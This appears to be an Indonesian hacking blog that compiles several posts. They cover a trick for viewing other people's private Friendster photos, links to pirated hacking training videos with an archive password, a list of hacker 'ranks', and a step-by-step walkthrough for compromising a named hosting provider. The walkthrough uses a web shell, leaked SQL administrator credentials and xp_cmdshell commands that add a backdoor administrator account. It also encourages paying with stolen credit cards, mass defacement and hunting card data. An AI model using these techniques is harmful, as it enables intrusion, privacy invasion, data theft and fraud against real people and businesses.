Hacking private photo di friendster

Tulisan ini dibuat karena penulis ingin tahu sosok teman penulis yang tiba-tiba menjadi tobat atas kelakuannya.. hahahaha…

Saat kita penasaran ingin tahu isi dari private photo yang ada di friendster, berikut ini ada sedikit trik untuk menyiasati melihat private photo tersebut…

Alat-alat persiapan:
1. komputer dengan koneksi internet (so pasti lah)
2. camilan plus susu ultra
3. rokok atau ganja… (nge fly bozz)
4. tambah vodka lebih baik…..(tidak harus)

permainan dimulai:
– Buka friendster (kalo tidak punya account friendster juga tidak apa2)
– Cari target anda yang mempunyai photo private

misal target:

http://www.profiles.friendster.com/28926674

– Selanjutnya yang kita butuhkan adalah photo album sang target. tambahkan url diatas menjadi berikut

http://www.profiles.friendster.com/viewalbums.php?uid=28926674

– Dari halaman album target (jika menggunakan firefox)buka menu view,page source untuk mencari uid target. tekan kombinasi ctrl+f dan masukkan keyword     “pageOwnerID”(tanpa tanda petik).

jika ketemu misal: pageOwnerID=”2892664” ,simpan dulu uid target.

– Berikutnya cari id album target, caranya tekan ctrl+f masukkan keyword “privacy”(tanpa tanda petik), cari album privacy yang bersifat private.jika ketemu misal: “<span id=”abAlbumPrivacy-373200955″>Private</span>”, simpan dulu id album target.

sehingga info yang didapat adalah:

uid = 2892664
id album = 373200955

– Dari info diatas,buka halaman web baru dan masukkan alamat berikut:

http://www.friendster.com/photolist_ajax.php?uid=(Uid FS Target)&a=(id Album)&page=0

– Selanjutnya masukkan uid dan id albums pada alamat diatas menjadi:

http://www.friendster.com/photolist_ajax.php?uid=2892664&a=373200955&page=0

– Jika berhasil akan menghasilkan halaman yang berisi tulisan gak jelas.. hahaha.. tapi tidak perlu dibaca semua anda cukup cari angka yang didepannya terdapat kata “rid”, dan cari sebanyak berapa kata “rid” dihalaman tersebut ini menunjukkan seberapa banyak photo yang diprivate.

misal “rid”:”660707544″

– langkah berikutnya buka salah satu photo public target sebagai batu loncatan untuk melihat photo private yang lain, caranya klik kanan photo target dan pilih properties. Ambil link photo public target

misal: http://photos-674.friendster.com/e1/photos/47/66/28926674/1_831772173m.jpg

masukkan dalam url address, dari alamat tersebut masukkan angka “rid” yang kita temukan tadi dibagian akhir dari deretan angka sebelum .jpg

misal: http://photos-674.friendster.com/e1/photos/47/66/28926674/1_660707544.jpg

dan hasilnya …. wawaaaahhhhhhh….. gambar Orang ML hahahaha…. untuk meliahat photo yang lainnya tinggal ganti deretan angka terakhir sebelum .jpg dengan angka “rid” yang kita temukan tadi…

Sekian dan hasilnya bisa dicoba sendiri…

Nothing Secure On internet….
thanks: Hackers-center;R3d_fl4g;Balikita;coco_nk4l;UnderDos

stay close to drugs… Sekarang bukan jamannya menjadi anak baik… hahahahah

Advertisements

VIDEO HACKING | Career Academy HAcking

Berikut ada beberapa alamat untuk mendownload tutorial video HAcking….

silahkan bagi yang ingin mendownload……..

-Training Module 1 Ethical Hacking and Penetration Testing – cd 1 – 250 mb
http://rapidshare.com/files/6870957/traininga.part1.rar.html
http://rapidshare.com/files/6875509/traininga.part2.rar.html
http://rapidshare.com/files/6880184/traininga.part3.rar.html
http://rapidshare.com/files/6884786/traininga.part4.rar.html
http://rapidshare.com/files/6889797/traininga.part5.rar.html
http://rapidshare.com/files/6890170/traininga.part6.rar.html
————————————————————
-Training Module 2 Footprinting and Reconnaissance – cd 2 – 210 mb

http://rapidshare.com/files/6920123/trainingb.part1.rar.html
http://rapidshare.com/files/6925380/trainingb.part2.rar.html
http://rapidshare.com/files/6930474/trainingb.part3.rar.html
http://rapidshare.com/files/6935598/trainingb.part4.rar.html
http://rapidshare.com/files/6937268/trainingb.part5.rar.html
————————————————————
-Training Module 3 TCP IP Basics and Scanning – cd 3 – 153 mb

http://rapidshare.com/files/6950222/trainingc.part1.rar.html
http://rapidshare.com/files/6954540/trainingc.part2.rar.html
http://rapidshare.com/files/6958405/trainingc.part3.rar.html
http://rapidshare.com/files/6958651/trainingc.part4.rar.html
————————————————————
-Training Module 4 Enumeration and Verification – cd 4 – 200 mb

http://rapidshare.com/files/6995889/trainingd.part1.rar.html
http://rapidshare.com/files/6999123/trainingd.part2.rar.html
http://rapidshare.com/files/7002551/trainingd.part3.rar.html
http://rapidshare.com/files/7005909/trainingd.part4.rar.html
http://rapidshare.com/files/7006074/trainingd.part5.rar.html
————————————————————
-Training Module 5 Hacking Defending Wireless Modems – cd 5 – 94 mb

http://rapidshare.com/files/7017480/traininge.part1.rar.html
http://rapidshare.com/files/7021255/traininge.part2.rar.html
————————————————————
-Training Module 6 Hacking Defending Web Servers – cd 6 – 150 mb

http://rapidshare.com/files/7029199/trainingf.part1.rar.html
http://rapidshare.com/files/7034545/trainingf.part2.rar.html
http://rapidshare.com/files/7039580/trainingf.part3.rar.html
http://rapidshare.com/files/7040200/trainingf.part4.rar.html
————————————————————
-Training Module 7 Hacking Defending Web Applications – cd 7 – 110 mb

http://rapidshare.com/files/7049302/trainingg.part1.rar.html
http://rapidshare.com/files/7054559/trainingg.part2.rar.html
http://rapidshare.com/files/7056051/trainingg.part3.rar.html
————————————————————
-Training Module 8 Sniffers and Session Hijacking – cd 8 – 115 mb

http://rapidshare.com/files/7069844/trainingh.part1.rar.html
http://rapidshare.com/files/7076146/trainingh.part2.rar.html
http://rapidshare.com/files/7084439/trainingh.part3.rar.html
————————————————————
-Training Module 9 Hacking Defending Windows Systems – cd 9 – 120 mb

http://rapidshare.com/files/7090868/trainingi.part1.rar.html
http://rapidshare.com/files/7095821/trainingi.part2.rar.html
http://rapidshare.com/files/7097885/trainingi.part3.rar.html
————————————————————
-Training Module 10 Hacking Defending Unix Systems – cd 10 – 150 mb

http://rapidshare.com/files/7136591/trainingJ.part1.rar.html
http://rapidshare.com/files/7139658/trainingJ.part2.rar.html
http://rapidshare.com/files/7142501/trainingJ.part3.rar.html
————————————————————
-Training Module 11 Rootkits Backdoors Trojans Tunnels – cd 11 – 115 mb

http://rapidshare.com/files/7147118/trainingk.part1.rar.html
http://rapidshare.com/files/7159091/trainingk.part2.rar.html
http://rapidshare.com/files/7160611/trainingk.part3.rar.html
————————————————————
-Training Module 12 Denial of Service and Botnets – cd 12 – 100 mb

http://rapidshare.com/files/7182977/trainingL.part1.rar.html
http://rapidshare.com/files/7187533/trainingL.part2.rar.html
————————————————————
-Training Module 13 Automated Pen Testing Tools – cd 13 – 102 mb

http://rapidshare.com/files/7202752/trainingm.part1.rar.html
http://rapidshare.com/files/7208149/trainingm.part2.rar.html
http://rapidshare.com/files/7208549/trainingm.part3.rar.html
————————————————————
-Training Module 14 Intrusion Detection Systems – cd 14 – 140 mb

http://rapidshare.com/files/7224433/trainingn.part1.rar.html
http://rapidshare.com/files/7230417/trainingn.part2.rar.html
http://rapidshare.com/files/7234950/trainingn.part3.rar.html
————————————————————
-Training Module 15 Firewalls – cd 15 – 160 mb

http://rapidshare.com/files/7252545/trainingo.part1.rar.html
http://rapidshare.com/files/7255895/trainingo.part2.rar.html
http://rapidshare.com/files/7258850/trainingo.part3.rar.html
http://rapidshare.com/files/7259491/trainingo.part4.rar.html
————————————————————
-Training Module 16 Honeypots and Honeynets – cd 16 – 120 mb

http://rapidshare.com/files/7262593/trainingp.part1.rar.html
http://rapidshare.com/files/7265259/trainingp.part2.rar.html
http://rapidshare.com/files/7266075/trainingp.part3.rar.html
————————————————————
-Training Module 17 Ethics and Legal Issues – cd 17 – 90 mb

http://rapidshare.com/files/7268140/trainingq.part1.rar.html
http://rapidshare.com/files/7269823/trainingq.part2.rar.html
————————————————————

Password = jL4XyiI7MxX3afM0

Tingkatan dan Karakter HACKER dalam IT | HACKER | CRACKER | IT

Dalam dunia hacker atau underground orang-orang yang menjadi hacker biasanya akan
melalui tahapan-tahapan. Tahapan-tahapan tersebut adalah:

1. Mundane Person

Tingkatan paling bawah. Seseorang pada tingkatan ini pada dasarnya tidak tahu sama sekali
tentang hacker dan cara-caranya, walaupun ia mungkin memiliki komputer sendiri dan akses
Internet. Ia hanya tahu bahwa yang namanya hacker itu membobol sistem komputer dan
melakukan hal-hal yang negatif (tindak kejahatan).

2. Lamer

Seseorang pada tingkatan ini masih dibingungkan oleh seluk beluk hacking karena ia berpikir
bahwa melakukan hacking sama seperti cara-cara warez (dalam dunia underground berarti
menggandakan perangkat lunak secara ilegal). Pengetahuannya tentang hal-hal seperti itu masih
minim, tapi sudah mencoba belajar. Seseorang pada tingkatan ini sudah bisa mengirimkan trojan
(yang dibuat orang lain) ke atau pada komputer orang lain ketika melakukan obrolan pada IRC
atau ICQ dan menghapus file-file mereka. Padahal ia sendiri tidak tahu persis bagaimana trojan
bekerja.
Seseorang yang sukses menjadi hacker biasanya bisa melalui tahapan ini dengan cepat bahkan
melompatinya.

3. Wannabe

Pada tingkatan ini seseorang sudah mengetahui bahwa melakukan tindakan hack itu lebih dari
sekedar menerobos masuk ke komputer orang lain. Ia lebih menganggap hal tersebut sebagai
sebuah filsafat atau way of life. Akhirnya ia jadi ingin tahu lebih banyak lagi. Ia mulai mencari,
membaca dan mempelajari tentang metode-metode hacking dari berbagai sumber.

4. Larva

Juga dikenal dengan sebutan newbie. Pada tingkatan ini ia sudah memiliki dasar-dasar teknik
hacking. Ia akan mencoba menerobos masuk ke sistem orang lain hanya untuk mencoba apa
yang sudah ia pelajari. Meskipun demikian, pada tingkatan ini ia mengerti bahwa ketika
melakukan hacking ia tidak harus merusak sistem atau menghapus apa saja jika hal itu tidak
diperlukan untuk menutupi jejaknya.

5. Hacker

Sebenarnya sulit untuk mengatakan tingkatan akhir atau final dari hacker telah tercapai, karena
selalu saja ada sesuatu yang baru untuk dipelajari atau ditemukan (mengumpulkan informasi
dan mempelajarinya dengan cermat merupakan dasar-dasar yang sama bagi seorang hacker) dan
hal tersebut juga tergantung perasaan (feeling). Meskipun demikian, menjadi seorang hacker
memang lebih menjurus pada hal pemikiran.

Hacker dengan Keahlian khusus:
Seorang hacker dapat mencapai pengalaman dan keahlian pada bidang-bidang tertentu seperti sistem
operasi atau sebuah Aplikasi. Dalam hal ini ada dua tingkatan, yaitu :

1. Wizard

Istilah ini diberikan pada seseorang yang telah memiliki pengetahuan luas dibidangnya.
Kemampuannya tersebut tidak diragukan lagi.

2. Guru

Istilah ini digunakan pada seseorang yang mengetahui semua hal pada bidangnya, bahkan yang
tidak terdokumentasi. Ia mengembangkan trik-trik tersendiri melampaui batasan yang
diperlukan. Kalau bidangnya berkaitan dengan aplikasi, ia tahu lebih banyak daripada pembuat
aplikasi tersebut.

Karakter hacker yang bersifat merusak, yaitu :

1. Dark-side Hacker

Istilah ini diperoleh dari film Star Wars-nya George Lucas. Seorang Dark-side hacker sama
seperti Darth Vader (tokoh dalam film Star Wars) yang tertarik dengan kekuatan kegelapan. Hal
ini tidak ada hubungannya dengan masalah “baik” atau “jahat” tapi lebih kepada masalah “sah
(sesuai hukum yang berlaku)” dan “kekacauan”. Seorang Dark-side hacker punya kemampuan
yang sama dengan semua hacker, tapi “sisi gelap” dari pikirannya membuat ia menjadi unsur
berbahaya untuk semua komunitas.

2. Malicious Hacker

Istilah untuk menyebut seseorang yang merusak sistem orang lain untuk sekedar iseng (tidak
merasa bersalah) tanpa memperoleh apa pun dari tindakannya tersebut.

Trik hacking server hosting

—- saya cuma mempublish ulang artikel dari situs mana q da lupa tapi asikk lhoo…

silahkan dicoba klo berhasil pasti ketagihan….—————-
Edthosting.com adalah salah satu hosting service yang cukup besar di US sono, tapi anehnya banyak sekali celah-celah keamanan yang ada. Salah satu celah keamanan yang cukup besar yaitu di bagian yang sering disebut FSO (File System Object). Untuk mengetahui lebih detail mengenai fso silahkan saja kunjungi situs Microsoft atau lainnya karena gue malas ngejelasin disini.

Untuk lebih jelas sekarang kita langsung saja praktek.
Bahan yang diperlukan:
1. Sedikit pengetahuan tentang Asp/Asp.Net
2. Sedikit pengetahuan tentang SQL Server
3. Sedikit pengetahuan tentang DOS Command
4. Script ASPY.ASP buatan Vela iNC , download di http://www.Planet-Source-Code.com
5. Hosting Account di edthosting.com yang dapat dibeli dengan kartu kredit curian, dengan menggunakan proxy US. Dibawah akan dilampirkan beberapa hosting account dengan passwordnya.

Sekarang kita mulai:
1. Apabila anda sudah mempunyai hosting account maka upload file aspy.asp ke directory utama anda dengan gunakan ftp. Kemudian panggil aspy.asp lewat web browser anda (http://situs-anda.com/aspy.asp) dan default passwordnya adalah “password” (tanpa tanda kutip) kemudian tekan enter.

2. Anda akan melihat bahwa directory anda berada di “c:\inetpub\website\situs-anda_com”. Sekarang coba anda ganti menjadi “c:\inetpub\website\” dan binggo anda akan melihat seluruh hosting account yang ada pada server tersebut dan silahkan anda menjelajahi semua directory yang ada didalam server tersebut termasuk ke directory “c:\”.

3. Apabila anda teliti anda akan menemukan file c:\trace.log yang berisi user dan password SQL server. Pilih File tersebut kemudian clik “edit”, Dari file trace.log tersebut didapat hasil yaitu :
a. Nama SQL Server : http://www.empiredatatech.com
b. Username : card471
c. Password : ty38vxqxxx
d. Default database: EDT
Setelah saya teliti ternyata user tersebut mempunyai hak sebagai SA pada SQL server tersebut. Kita jelajahi lebih jauh tentang database EDT pada server tersebut.

4. Jalankan SQL query analyser pada ASPY.ASP (pojok kanan atas), masukkan: “Driver={SQL Server}; Server=www.empiredatatech.com ; Database=EDT; DSN=; UID=card471; PWD=ty38vxq|06;” pada connection string (tanpa tanda kutip). Kemudian klik “table”. Maka akan melihat seluruh table yang ada pada Database tersebut. Table yang cukup penting adalah FTP_User_info. Untuk melihat data yang terdapat pada tabel tersebut masukkan “SELECT * FROM FTP_USER_INFO” dan binggo!! Anda akan melihat seluruh user ftp beserta passwordnya diseluruh server yang ada di hosting service tersebut. Pada langkah ini saja anda sudah bisa mendeface seluruh site yang ada pada database tersebut melalui ftp. Jadi bukan hal susah bagi Edan_Tenanan untuk mendeface kurang lebih 2500 situs dalam satu malam dengan munggunakan FTP Account, tapi ada cara yang lebih cepat dan mudah yang akan dijelaskan dibawah.

5. Dari database EDT didapat berbagai kesimpulan yaitu:
a. Hosting service ini terdiri dari 11 server shared hosting mulai dari yang nama servernya http://www.empiredatatech.com, ww2.empiredatatech.com, sampai ww11.empiredatatech.com dimana semua server memiliki hampir 300 shared hosting dan memiliki SQL server dimana user card471 memiliki hak sebagai sistem administrator (SA).
b. Hosting ini juga memiliki puluhan VPS (virtual private hosting) yang dapat diakses melalui remote desktop. Dan juga memiliki beberapa Dedicated server diantaranya EDTDSA, EDTDSB, EDTDSC dan lain-lain.

6. Apabila kita mau melihat semua database yang ada pada salah satu server kita dapat gunain Http://enterprisemanager.edthosting.com, disini kita juga bisa membuat user yang mempunya hak sebagai sa asalkan kita login sebagai card471 yang mempunyai hak sebagai sa. Bagi yang tertarik dengan kartu kredit silahkan cari sendiri didalam Semua SQL server tersebut satu-persatu. Kebanyakan situs toko yang ada EDTHOSTING menggunakan shoppingcart ASPdotNETstorefront yang mana data kartu kredit beserta CVV-nya telah ter-enkripsi, tapi jangan takut Edan Tenanan bisa menanggulanginya, kalo ada belum tau tanya aja pasti dijawab, tapi kalo udah tau jangan ngoceh hehehehehe

7. Sekarang yang jadi pertanyaan bagaimana edan_tenanan dapat mendeface/mematikan (nggak jelas deface itu bagaimana gue nggak ngerti) seluruh situs hanya dalam waktu satu malam ???????

OK sekarang gue jelasin bagaimana Edan_tenanan dapat menghancurkan seluruh site tersebut .

1. Masuk di http://enterprisemanager.edthosting.com pilih asp enterprisemanager kemudian login server: http://www.empiredatatech.com dengan user: card471 pass: ty38vxq|06 kemudian jalankan Query:
a. XP_CMDSHELL ‘Net user edan tenanan /add’ perintah ini untuk menambahkan user: edan password: tenanan pada komputer server
b. XP_CMDSHELL ‘Net localgroup Administrators edan /add’ perintah ini untuk menjadikan user edan sebagai user dengan hak administrators

2. Jalankan RemoteDesktop (windows XP keatas) kemudian masukkan namaserver (dalam hal ini http://www.empiredatatech.com) kemudian klik connect, tunggu sebentar lalu masukkan user: edan Password:tenanan kemudian pilih OK. Binggo !! Edan Tenanan telah remote ke server dan bisa mematikan atau mendelete semua hosting service yang ada pada IIS servernya termasuk memodifikasi DNS nya, Menjalankan proxy server, menjalankan trojan, menjalankan BOT RagnaRok dan lain-lain.

3. Anda bisa melakukan hal tersebut pada 10 server yang lain, selama IP anda tidak diblokir oleh firewall hehehehe.

4. Bagaimana caranya agar password user Administrator? Caranya dengan perintah ‘Net user Administrator passbaru’ .